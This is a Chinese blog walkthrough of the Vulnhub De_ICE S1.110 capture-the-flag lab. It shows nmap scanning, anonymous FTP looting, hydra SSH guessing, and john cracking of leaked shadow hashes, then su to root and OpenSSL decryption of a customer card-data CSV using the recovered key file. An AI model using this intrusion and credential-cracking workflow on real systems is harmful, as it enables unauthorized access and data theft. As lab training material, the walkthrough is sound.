Vulnhub-靶机-De_ICE_S1.110

关于 De_ICE_S1.110 演示

https://www.youtube.com/watch?v=oLM6L1_LYV0&feature=youtu.be
https://hackerzoneh.blogspot.com/2014/05/de-ice-110.html
https://blog.techorganic.com/2011/07/20/de-ice-hacking-challenge-part-2/
https://blog.g0tmi1k.com/2010/02/de-icenet-v11-1110-level-1-disk-2/
https://pur3h4t3.blogspot.com/2007/12/de-ice-pentest-disc-1100.html
https://www.freebuf.com/column/196837.html
首先是使用nmap扫描
nmap -sC -sV -p- -oA deice110 10.57.31.34
根据扫描出来的结果提示可能要使用到的一下工具

nmap
ftp
strings
john the ripper
ssh

- FTP can be set for anonymous login exclusively
- Find out what files don't belong in a directory, and look at it closely
- If you can't crack the passwords, make sure you understand all the flags within john the ripper
- If you get customer credit card information, you've defeated this challenge.  Congratulations

尝试各种可能的工具暴力猜解目标站点目录
python3 dirsearch.py -u http://10.57.31.34 -w /usr/share/dirb/wordlists/big.txt -e php
dirb http://10.57.31.34 -w /usr/share/dirb/wordlists/common.txt
gobuster dir -u http://10.57.31.34 -w /usr/share/wordlists/dirb/big.txt
根据扫描的结果，发现开放ftp端口，并且是允许匿名登录的，所以登录ftp下载所有ftp的文件夹，发现这个工具套件"cygwin" 这个工具套件查询了下，简单的说就是在Windows下能够运行Linux命令的套件工具
这里使用的ftp登录工具是lftp这个工具，我非常喜欢这个工具，因为她可以支持Tab键，下载ftp中的所有文件夹的命令如下：
mirror download download -左边是下载的目标文件夹，右边是下载到本地的文件夹名称
下载完成之后进入download文件夹使用命令 ls -lsaR * > ftplistanaysis.txt
上述意思是列出所有文件夹中的所有内容包括其子目录的文件名称和大小等等
然后本地通过图形或者vim编辑器一目了然的查看有哪些敏感可以利用的文件
经过查询，发现两个文件含有敏感信息一个是core 一个是shadow
刚开始我还没有发现core这个文件藏着重要敏感信息，只发现了shadow文件，并尝试使用john破解密码
发现的敏感文件如下：
/etc/shadow /opt/cygwin/etc/passwd,group bash.bashrc /opt/cygwin/etc/default/etc/bash.bashrc
/usr/bin/websave
首先尝试使用hydra看看是否存在简单的密码，可以破解
hydra -L usernames.txt -P finalusername.txt -e nsr -u -t 8 10.57.31.34 ssh
发现并没有成功，那么就直接使用ftp下载下来的shadow文件进行破解

cat shadow 

root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:12859:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::

使用darkc0de.txt暴力破解成功
site:https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkc0de.txt
账户和密码是root:toor

john --wordlist=/usr/share/wordlists/seclist/scanlist/Passwords/darkc0de.txt shadow 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
toor             (root)
1g 0:00:00:03 DONE (2019-11-17 12:01) 0.2645g/s 341942p/s 341942c/s 341942C/s too-big..Toothaker
Use the "--show" option to display all of the cracked passwords reliably
Session completed

john --show shadow 
root:toor:12859:0:::::

1 password hash cracked, 0 left

但是发现这个密码是错误的，不能登录成功，并且root也不允许直接远程登录
所以经过再次探索发现有一个文件core存在敏感信息
通过命令strings查看这个core文件，因为这个文件使用file命令查看发现是可执行的ELF的文件
查看结果如下：

strings core  |tail 
.dynstr
.gnu.version
.gnu.version_d
.text
.note
.eh_frame_hdr
.eh_frame
.dynamic
.useless
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

将上述查看到的结果密码进行整理，可以直接使用john进行暴力破解，将整理好的密码文件命名为 passwd

cat passwd 
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

使用密码字典darkc0de.txt进行暴力破解
john --wordlist=/usr/share/wordlists/seclist/scanlist/Passwords/darkc0de.txt --user=root,aadams,bbanter,ccoffee passwd

john --wordlist=/usr/share/wordlists/seclist/scanlist/Passwords/darkc0de.txt --user=root,aadams,bbanter,ccoffee passwd 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Complexity       (root)
Zymurgy          (bbanter)
2g 0:00:00:13 DONE (2019-11-17 12:26) 0.1515g/s 107371p/s 351000c/s 351000C/s Zuzana..zzzzzzzzzzzzzzz
Use the "--show" option to display all of the cracked passwords reliably
Session completed


john --show passwd 
root:Complexity:13574:0:::::
bbanter:Zymurgy:13571:0:99999:7:::

2 password hashes cracked, 2 left

root:Complexity
bbanter:Zymurgy
最终成功破解出来两个账户和密码，使用普通用户进行远程ssh登录然后使用su 命令切换到root用户
开始查找加密文件
find / -name *.enc 或者 find / -iname *.enc

 find / -name *.enc
/mnt/live/mnt/hdc/rootcopy/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc
/mnt/live/mnt/hdc/rootcopy/home/root/.save/customer_account.csv.enc
find: WARNING: Hard link count is wrong for /mnt/live/proc/5934: this may be a bug in your filesystem driver.  Automatically turning on find's -noleaf option.  Earlier results may have failed to include directories that should have been searched.
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin1.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin2.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin9.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/PSLatin1.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/dc.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/dvips.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/big5.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/euc-kr.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-2.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-3.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-4.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-5.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-7.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-8.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-9.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1250.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1252.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-jisx0221.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-unicode.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-cp932.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jdk117.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jisx0221.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-unicode.enc
/mnt/live/memory/images/02_core.mo/usr/share/groff/1.19.2/font/devps/text.enc
/mnt/live/memory/changes/home/root/.save/customer_account.csv.enc
/mnt/live/memory/changes/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc
/usr/share/t1lib/Fonts/enc/IsoLatin1.enc
/usr/share/t1lib/Fonts/enc/IsoLatin2.enc
/usr/share/t1lib/Fonts/enc/IsoLatin9.enc
/usr/share/t1lib/Fonts/enc/PSLatin1.enc
/usr/share/t1lib/Fonts/enc/dc.enc
/usr/share/t1lib/Fonts/enc/dvips.enc
/usr/share/groff/1.19.2/font/devps/text.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/big5.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/euc-kr.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-2.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-3.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-4.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-5.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-7.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-8.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-9.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1250.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1252.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-jisx0221.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-unicode.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-cp932.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jdk117.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jisx0221.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-unicode.enc
/home/root/.save/customer_account.csv.enc
/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc

找到了加密文件，发现加密文件旁边有个copy.sh脚本
查看此脚本有如下信息：

root@slax:/home/root/.save# cat copy.sh 
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1
root@slax:/home/root/.save# ls /etc/ssl/certs/pw
/etc/ssl/certs/pw
root@slax:/home/root/.save# cat /etc/ssl/certs/pw
d2Ews4TgaQm72C0nr5t5U9noRfdllV62speWeC410il1lfd3Cxe2RqSx5o0Of
root@slax:/home/root/.save# ls
copy.sh*  customer_account.csv.enc
root@slax:/home/root/.save# file customer_account.csv.enc 
customer_account.csv.enc: data
root@slax:/home/root/.save# strings customer_account.csv.enc 
Salted__
,xM'    7Uz
`@Tw
Ab(H
/PQ)oph
X2$,
0DZR"
nz,"y

此时便一目了然了，知道加密算法和加密密码，那么加个-d参数即可解密文件
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out /home/root/customer_account.csv -pass file:/etc/ssl/certs/pw
查看解密后的文件内容

root@slax:/home/root/.save# cat /home/root/customer_account.csv 
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save#

其他不同的点记录
wget -qr ftp://10.7.9.25 批量下载ftp里面的所有文件
https://hackerzoneh.blogspot.com/

#!/usr/bin/env python
# shadow2pass: generate a dummy passwd file with 
# the encrypted passwords from a shadow file
 
import sys
 
start_uid = 500  # random UID
start_gid = 500  # random GID
for line in open(sys.argv[1]):
    a = line.split(":")
    print "%s:%s:%d:%d:,,,:/home/%s:/bin/bash" % \
        (a[0], a[1], start_uid, start_gid, a[0])
    start_uid += 1

root@tantras# ~/bin/shadow2pass myshadow.txt > mypass.txt
root@tantras# cat mypass.txt 
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:500:500:,,,:/home/root:/bin/bash
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:501:500:,,,:/home/aadams:/bin/bash
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:502:500:,,,:/home/bbanter:/bin/bash
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:503:500:,,,:/home/ccoffee:/bin/bash

https://blog.techorganic.com/
免责申明:本人所撰写的文章，仅供学习和研究使用，请勿使用文中的技术或源码用于非法用途，任何人造成的任何负面影响，或触犯法律，与本人无关

最后编辑于：2019.11.20 15:01:12

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 204,530评论 6赞 478
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 86,403评论 2赞 381
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 151,120评论 0赞 337
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 54,770评论 1赞 277
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 63,758评论 5赞 367
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 48,649评论 1赞 281
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 38,021评论 3赞 398
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 36,675评论 0赞 258
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 40,931评论 1赞 299
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 35,659评论 2赞 321
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 37,751评论 1赞 330
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 33,410评论 4赞 321
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 39,004评论 3赞 307
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 29,969评论 0赞 19
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 31,203评论 1赞 260
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 45,042评论 2赞 350
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 42,493评论 2赞 343

Vulnhub-靶机-De_ICE_S1.110

关于 De_ICE_S1.110 演示

推荐阅读更多精彩内容